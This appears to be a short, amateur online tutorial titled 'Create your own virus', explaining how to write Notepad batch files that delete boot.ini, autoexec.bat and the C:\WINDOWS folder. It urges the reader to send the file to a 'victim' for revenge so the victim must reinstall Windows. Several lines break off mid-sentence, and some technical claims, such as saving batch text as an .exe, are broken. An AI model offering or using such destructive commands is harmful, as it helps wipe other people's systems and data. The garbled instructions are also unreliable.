First of all Open your notepad and
type the following......... del c:\boot।
ini c:\del autoexec.bat Now Save
as anyname.exe. Create this in C:
The only thing you need is
1. Create a text file called TEST.txt
(empty) in C:\ 2. Now in your
notepad type "erase C:
\TEST.txt" (without the quotes).
Then save it as "Test.cmd". 3. Now
run the file "Test.cmd"go to C:\
and you'll see your Test.txt is
Now, the real work :
1. Go to Notepad and type erase C:
\WINDOWS and save it as
2. Now DON'T Run the file or you'll
lose your WINDOWS map.
So, that's the Virus. In this way
you can make a virus to delete any
file you want.
Now to take revenge. Send you file
to your victim. Once victim opens
it. WINDOWS map is Deleted. And
he will have to install WINDOWS
Beware : Its simple but a strong
virus that can delete anyones
Windows OS ...Note : I am not
Taking any Responsibilties if by
this you damage your windows.
Create your own virus....simple and fast...!
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